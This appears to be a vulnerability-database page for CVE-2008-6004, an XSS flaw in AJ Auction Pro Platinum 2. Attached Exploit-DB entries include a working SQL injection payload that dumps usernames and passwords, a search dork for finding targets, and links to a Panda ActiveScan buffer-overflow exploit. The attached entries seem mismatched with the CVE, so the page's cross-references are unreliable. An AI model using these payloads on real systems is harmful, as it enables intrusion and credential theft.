CVE-2008-6004
published 2009-01-28CVE-2008-6004: Cross-site scripting (XSS) vulnerability in search.php in AJ Auction Pro Platinum 2 allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.22%
64.8th percentile
Cross-site scripting (XSS) vulnerability in search.php in AJ Auction Pro Platinum 2 allows remote attackers to inject arbitrary web script or HTML via the product parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aj_square | aj_auction | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AJ Auction Pro Platinum - 'seller_id' SQL Injection
exploitdb·2008-09-25
CVE-2008-6004 AJ Auction Pro Platinum - 'seller_id' SQL Injection
AJ Auction Pro Platinum - 'seller_id' SQL Injection
---
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
Exploit-DB
Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow
exploitdb·2008-07-04
CVE-2008-3156 Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow
Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow
---
Author: Karol Wiesek
Homepage: http://karol.wiesek.pl/
There exists two vulnerabilities in Panda Security ActiveScan 2.0 Update function.
1) typical overflow ( this exploit )
2) Update function allows to install any ( attacker suplied ) CABinet into victims system
Panda Security have not respond in any manner, thus i have no information of any patches, plans for patching ...
* UPDATE *
Panda has patched newest version, so update will not connect to custom ( attacker supplied ) URL.
Exploit:
http://karol.wiesek.pl/files/panda.tgz
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6004.tgz (2008-panda.tgz)
# milw0rm.com [2008-07-04]
No writeups or analysis indexed.
2009-01-28
Published